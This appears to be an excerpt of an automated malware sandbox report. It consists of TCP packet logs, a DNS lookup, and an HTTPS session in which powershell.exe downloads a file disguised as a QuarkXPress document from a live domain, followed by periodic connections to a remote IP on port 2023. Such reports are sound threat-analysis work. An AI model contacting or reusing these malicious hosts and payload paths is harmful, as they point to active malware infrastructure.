                                                                                  Dec 19, 2024 12:47:34.043297052 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.071516991 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.071855068 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.074457884 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.074568987 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.076122046 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.076272011 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.083658934 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.083849907 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.094505072 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.094647884 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.103841066 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.103955030 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.113439083 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.113545895 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.122723103 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.122852087 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.179712057 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.179867029 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.215159893 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.215321064 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.219960928 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.220161915 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.226085901 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.226186991 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.233784914 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.233983040 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.237265110 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.237394094 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.240400076 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.240509987 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.244358063 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.244503021 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.247548103 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.247675896 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.250955105 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.251339912 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.254100084 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.254177094 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.258198023 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.258275986 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.261146069 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.261354923 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.265067101 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.265274048 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.268420935 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.268496037 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.271716118 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.271879911 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.368473053 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.368573904 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.371547937 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.371690035 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.408603907 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.408855915 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.411638975 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.411739111 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.414741039 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.414920092 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.475017071 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.475136042 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.704916954 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.704927921 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.705015898 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.707057953 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.707461119 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.710582972 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.710659027 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.713402987 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.713481903 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:34.938133955 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.938148975 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:34.938277006 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:35.860796928 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:35.860831976 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:35.860913992 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:35.860913992 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.379796982 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.379811049 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.379903078 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.613148928 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.613248110 CET44349731202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:36.613281012 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.613347054 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:36.616476059 CET49731443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.719304085 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.719351053 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:47:59.719424009 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.729753017 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:47:59.729774952 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.409054041 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.409308910 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.461263895 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.461286068 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.461661100 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:01.461766958 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.466075897 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:01.507352114 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.247817993 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.247840881 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.248013973 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.248034000 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.248075962 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.459754944 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.459767103 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.459850073 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.486913919 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.487020969 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.512300968 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.512459040 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.538041115 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.538151026 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.699623108 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.700051069 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.715873957 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.715992928 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.738753080 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.738830090 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.756475925 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.756577015 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.773485899 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.773619890 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.796633005 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.796890020 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.813730955 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.813910961 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.926156998 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.926337004 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.937684059 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.937786102 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.952408075 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.952620983 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.958390951 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.958503962 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.964690924 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.964761019 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.970912933 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.971019983 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.978898048 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.979023933 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.985336065 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.985641956 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.991416931 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.991517067 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:02.999414921 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:02.999644041 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.004791021 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.005125046 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.044416904 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.044581890 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.049556971 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.049670935 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.118295908 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.118380070 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.126032114 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.126203060 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.160994053 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.161113977 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.166394949 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.166479111 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.170615911 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.170707941 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.174485922 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.174566031 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.177628994 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.177709103 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.180885077 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.180970907 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.184942961 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.185029984 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.190332890 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.190443039 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.191900015 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.191968918 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.195846081 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.195940971 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.198713064 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.198801041 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.202358007 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.202428102 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.206371069 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.206453085 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.209889889 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.209971905 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.308868885 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.308938026 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.311440945 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.311554909 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.349874020 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.350022078 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.352992058 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.353059053 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.356210947 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.356266975 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.419239044 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.419446945 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.422261953 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.422674894 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.652606964 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.652621984 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.652709961 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.652709961 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.655322075 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.655459881 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.658610106 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.658675909 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.661643028 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.661854982 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.884062052 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.884097099 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.884171963 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.884171963 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.890650988 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.890723944 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:03.894628048 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:03.894764900 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334203959 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:05.334239006 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:05.334302902 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334319115 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334363937 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:05.334412098 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334422112 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:05.334462881 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334510088 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334518909 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:05.334544897 CET44349738202.71.109.228192.168.2.4
                                                                                  Dec 19, 2024 12:48:05.334548950 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334568977 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:05.334584951 CET49738443192.168.2.4202.71.109.228
                                                                                  Dec 19, 2024 12:48:10.853153944 CET497392023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:10.972671032 CET20234973945.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:10.972754002 CET497392023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:10.973017931 CET497392023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:11.092825890 CET20234973945.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:15.868180037 CET497392023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:16.030354023 CET20234973945.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:20.884622097 CET497572023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:21.004172087 CET20234975745.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:21.004247904 CET497572023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:21.004419088 CET497572023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:21.124603987 CET20234975745.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:25.884350061 CET497572023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:26.047463894 CET20234975745.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:30.899895906 CET497832023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:31.019575119 CET20234978345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:31.019696951 CET497832023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:31.019882917 CET497832023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:31.139390945 CET20234978345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:32.853204012 CET20234973945.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:32.853312016 CET497392023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:35.915198088 CET497832023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:36.082236052 CET20234978345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:40.931087971 CET498032023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:41.051568985 CET20234980345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:41.051676989 CET498032023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:41.051933050 CET498032023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:41.171430111 CET20234980345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:42.884381056 CET20234975745.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:42.884494066 CET497572023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:45.931067944 CET498032023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:46.098416090 CET20234980345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:50.947010040 CET498282023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:51.066616058 CET20234982845.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:51.066761971 CET498282023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:51.067018032 CET498282023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:51.186737061 CET20234982845.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:52.916277885 CET20234978345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:48:52.916332006 CET497832023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:55.962194920 CET498282023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:48:56.122397900 CET20234982845.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:00.962594986 CET498532023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:01.082238913 CET20234985345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:01.082359076 CET498532023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:01.082465887 CET498532023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:01.202369928 CET20234985345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:02.963064909 CET20234980345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:02.963610888 CET498032023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:05.962244034 CET498532023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:06.122458935 CET20234985345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:10.962425947 CET498742023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:11.084292889 CET20234987445.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:11.084378004 CET498742023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:11.084588051 CET498742023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:11.204031944 CET20234987445.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:12.963112116 CET20234982845.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:12.963229895 CET498282023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:15.962384939 CET498742023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:16.122339964 CET20234987445.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:20.962524891 CET499002023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:21.082232952 CET20234990045.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:21.082444906 CET499002023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:21.085761070 CET499002023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:21.205420017 CET20234990045.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:22.995170116 CET20234985345.149.241.141192.168.2.4
                                                                                  Dec 19, 2024 12:49:22.995240927 CET498532023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:25.962182999 CET499002023192.168.2.445.149.241.141
                                                                                  Dec 19, 2024 12:49:26.122230053 CET20234990045.149.241.141192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 19, 2024 12:47:29.848903894 CET5900153192.168.2.41.1.1.1
                                                                                  Dec 19, 2024 12:47:30.756105900 CET53590011.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 19, 2024 12:47:29.848903894 CET192.168.2.41.1.1.10x816dStandard query (0)www.tdejb.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 19, 2024 12:47:30.756105900 CET1.1.1.1192.168.2.40x816dNo error (0)www.tdejb.comtdejb.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 19, 2024 12:47:30.756105900 CET1.1.1.1192.168.2.40x816dNo error (0)tdejb.com202.71.109.228A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.tdejb.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449731202.71.109.2284435752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-19 11:47:32 UTC173OUTGET /kp/Epilachna.qxd HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: www.tdejb.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-12-19 11:47:33 UTC232INHTTP/1.1 200 OK
                                                                                  Date: Thu, 19 Dec 2024 11:47:32 GMT
                                                                                  Server: Apache
                                                                                  Last-Modified: Fri, 13 Dec 2024 02:53:05 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 460072
                                                                                  Connection: close
                                                                                  Content-Type: application/vnd.quark.quarkxpress
